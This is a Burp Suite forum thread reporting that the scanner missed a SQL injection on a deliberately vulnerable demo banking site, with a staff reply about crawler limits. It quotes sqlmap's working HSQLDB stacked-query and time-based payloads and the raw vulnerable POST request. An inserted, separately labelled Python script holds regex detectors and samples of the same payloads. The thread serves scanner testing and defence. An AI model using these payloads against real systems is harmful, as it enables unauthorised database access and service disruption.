Burp Suite User Forum

Missed SQL Injection

Nicolas | Last updated: Oct 08, 2019 11:12AM UTC

Hi,

Doing some tests I noticed that Burp (version 2.1.04) is missing the SQL injection at http://zero.webappsecurity.com under the POST data field payeeId. sqlmap identifies it as follows:

sqlmap identified the following injection point(s) with a total of 46 HTTP(s) requests:
---
Parameter: payeeId (POST)
    Type: stacked queries
    Title: HSQLDB >= 1.7.2 stacked queries (heavy query - comment)
    Payload: payeeId=abc';CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR(7251),0),500000000),NULL)--

    Type: time-based blind
    Title: HSQLDB > 2.0 OR time-based blind (heavy query)
    Payload: payeeId=abc' OR CHAR(76)||CHAR(86)||CHAR(107)||CHAR(117)=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY(CHAR(65)||CHAR(69)||CHAR(83),NULL),0),500000000),NULL)-- GsOo
---
[14:02:48] [INFO] the back-end DBMS is HSQLDB

The POST request where Burp should have found the injection is:

POST /bank/pay-bills-get-payee-details.html HTTP/1.1
Host: zero.webappsecurity.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 13
Connection: close
Referer: http://zero.webappsecurity.com/bank/pay-bills.html
Cookie: JSESSIONID=29DB5859; username=username; password=password

payeeId=abc

The website is created for testing web scanner applications, so please feel free to use it for that purpose.
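For anyone triaging proxy or server logs from a scan like this, the following is an added example (not part of the thread or of Burp/sqlmap) that flags the two HSQLDB payload shapes sqlmap reported above in the payeeId field of form-encoded request bodies. The indicator names, regexes and size threshold are my own assumptions, and the sample bodies are constructed.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns for the two payload shapes from the sqlmap output above:
# a stacked query (quote, ';', CALL ...) and a heavy-query delay built from
# REPEAT(..., <huge count>). Names and the 7-digit threshold are assumptions.
STACKED_CALL = re.compile(r"'\s*;\s*CALL\b", re.IGNORECASE)
HEAVY_REPEAT = re.compile(r"\bREPEAT\s*\(.*?,\s*(\d{7,})\s*\)", re.IGNORECASE)
QUOTE_OR = re.compile(r"'\s+OR\s+\S", re.IGNORECASE)
COMMENT_TAIL = re.compile(r"--\s*\S*\s*$")


def parse_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body (last value wins)."""
    fields = {}
    for pair in body.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def classify_payee_id(body: str) -> dict:
    """Flag SQL-injection indicators in the payeeId field of one request body."""
    value = parse_form_body(body).get("payeeId", "")
    flags = {
        "stacked_query": bool(STACKED_CALL.search(value)),
        "heavy_query": bool(HEAVY_REPEAT.search(value)),
        "quote_or": bool(QUOTE_OR.search(value)),
        "comment_tail": bool(COMMENT_TAIL.search(value)),
    }
    flags["suspicious"] = any(flags.values())
    return flags


def suspicious_indices(bodies) -> list:
    """Indices of the bodies that carry at least one injection indicator."""
    return [i for i, b in enumerate(bodies) if classify_payee_id(b)["suspicious"]]


# Constructed sample bodies: two ordinary lookups, then the two sqlmap payloads
# quoted in the thread (the first URL-encoded, as a proxy log would record it).
SAMPLE_BODIES = [
    "payeeId=sprint",
    "payeeId=abc",
    "payeeId=abc%27%3BCALL+REGEXP_SUBSTRING%28REPEAT%28RIGHT%28CHAR%287251%29%2C0%29"
    "%2C500000000%29%2CNULL%29--",
    "payeeId=abc' OR CHAR(76)||CHAR(86)||CHAR(107)||CHAR(117)=REGEXP_SUBSTRING("
    "REPEAT(LEFT(CRYPT_KEY(CHAR(65)||CHAR(69)||CHAR(83),NULL),0),500000000),NULL)-- GsOo",
]

if __name__ == "__main__":
    for i in suspicious_indices(SAMPLE_BODIES):
        print(i, classify_payee_id(SAMPLE_BODIES[i]))
```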

Burp User | Last updated: Oct 08, 2019 11:44AM UTC

Same case: forcing an audit on the specific URL /bank/pay-bills-get-payee-details.html brought up the SQL injection as a valid issue.

Liam, PortSwigger Agent | Last updated: Oct 08, 2019 02:16PM UTC

Thanks for this report, Nicolas. Burp Crawler doesn't currently handle JavaScript-heavy apps. We have this feature in this year's roadmap. Once we release the updated version of the crawler, we should find this issue with a crawl and audit. If I can be of any further assistance, please let me know.
